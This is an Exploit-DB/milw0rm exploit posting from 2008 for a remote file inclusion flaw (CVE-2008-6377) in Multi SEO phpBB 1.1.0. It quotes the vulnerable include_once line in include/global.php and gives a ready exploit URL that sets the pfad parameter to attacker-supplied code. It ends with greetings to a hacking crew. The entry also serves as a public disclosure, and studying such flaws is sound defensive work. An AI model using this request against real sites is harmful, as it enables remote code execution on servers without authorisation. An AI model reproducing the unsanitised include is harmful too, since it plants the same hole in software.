Multi SEO phpBB 1.1.0 pfad Remote File Inclusion Vulnerability

2008-12-03T00:00:00
ID EDB-ID:7335
Type exploitdb
Reporter NoGe
Modified 2008-12-03T00:00:00

Description

Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion Vulnerability. CVE-2008-6377. Webapps exploit for php platform

                                        
                                            ==========================================================================


  [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability

       Software : Multi SEO phpBB version 1.1.0

       Vendor   : http://www.phpbb-seo.de/

       Download : http://www.phpbb-seo.de/downloads/multi.html

       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==========================================================================


  [o] Vulnerable file


       include/global.php


        include_once ($pfad . 'include/config.php');



  [o] Exploit

       http://localhost/[path]/include/global.php?pfad=[evilcode]


==========================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.com/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
==========================================================================

# milw0rm.com [2008-12-03]